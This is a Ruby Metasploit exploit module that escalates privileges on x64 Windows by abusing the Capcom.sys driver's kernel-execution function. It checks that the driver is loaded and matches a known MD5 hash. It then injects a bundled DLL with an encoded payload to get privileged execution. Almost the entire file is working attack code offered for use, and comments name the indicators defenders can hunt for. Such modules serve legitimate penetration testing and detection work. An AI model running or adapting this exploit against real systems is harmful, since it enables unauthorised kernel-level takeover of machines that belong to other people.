##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  prepend Msf::Exploit::Remote::AutoCheck

  # Local privilege escalation through the Capcom.sys kernel driver.
  #
  # The module only proceeds when `check` sees a loaded driver named capcom.sys
  # whose MD5 matches the known build, so that name/hash pair is the indicator a
  # defender can hunt for or block. Windows 11 builds after 22000.194 refuse to
  # load the driver through the driver block list and are reported as Safe.
  #
  # @param info [Hash] module metadata the framework merges via update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',
      'Description' => %q{
        This module abuses the Capcom.sys kernel driver's function that allows for an
        arbitrary function to be executed in the kernel from user land. This function
        purposely disables SMEP prior to invoking a function given by the caller.
        This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
        Note that builds after 22000.194 contain deny lists that prevent this driver from loading.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'TheWack0lian', # Issue discovery
        'OJ Reeves' # exploit and msf module
      ],
      'Platform' => 'win',
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' => { 'EXITFUNC' => 'thread' },
      'Targets' => [
        [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
      ],
      'Payload' => { 'Space' => 4096, 'DisableNops' => true },
      'References' => [
        ['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']
      ],
      'DisclosureDate' => '1999-01-01', # non-vuln exploit date
      'DefaultTarget' => 0,
      # Meterpreter commands `check` depends on: file hashing and the driver list.
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            stdapi_fs_md5
            stdapi_sys_config_driver_list
          ]
        }
      },
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    }
    super(update_info(info, module_info))
  end

  # Framework check, also run automatically before `exploit` by the prepended
  # AutoCheck mixin.
  #
  # Returns Unknown for non-Windows sessions, pre-Windows-7 builds and server
  # editions; Safe when the build ships the driver block list, when the host is
  # not x64, or when no capcom.sys with the expected MD5 is loaded; Appears
  # otherwise. Version details come from the included post mixins.
  #
  # @return [Exploit::CheckCode]
  def check
    return Exploit::CheckCode::Unknown unless session.platform == 'windows'

    version = get_version_info
    too_old = version.build_number < Msf::WindowsVersion::Win7_SP0
    return Exploit::CheckCode::Unknown if too_old || version.windows_server?

    # Windows 11 builds after 22000.194 ship a driver block list that refuses to
    # load capcom.sys, so the host is not exploitable regardless of the file.
    if version.build_number > Rex::Version.new('10.0.22000.194')
      return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')
    end

    return Exploit::CheckCode::Safe unless sysinfo['Architecture'] == ARCH_X64

    capcom_driver_present? ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
  end

  # Entry point. Each guard raises through fail_with with the framework failure
  # code callers expect: an already elevated session is Failure::None, a failed
  # check is NotVulnerable, and a WOW64 session or an x86 target on an x64 host
  # is NoTarget. The DLL shipped in the framework data directory is then
  # injected with the encoded payload.
  def exploit
    fail_with(Failure::None, 'Session is already elevated') if is_system?

    check_result = check
    not_exploitable = check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
    fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') if not_exploitable

    if sysinfo['Architecture'] == ARCH_X64
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session') if session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') if target.arch.first == ARCH_X86
    end

    encoded = payload.encoded
    dll_path = ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll')
    execute_dll(dll_path, encoded)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end

  private

  # True when a loaded driver with basename capcom.sys hashes to the expected
  # MD5. The hash comparison is what separates the known build from an unrelated
  # file that happens to share the name; a mismatch leaves the check at Safe.
  #
  # @return [Boolean]
  def capcom_driver_present?
    expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'
    client.sys.config.getdrivers.each do |driver|
      next unless driver[:basename].downcase == 'capcom.sys'

      actual_checksum = Rex::Text.to_hex(client.fs.file.md5(driver[:filename]), '')
      return true if actual_checksum == expected_checksum
    end
    false
  end
end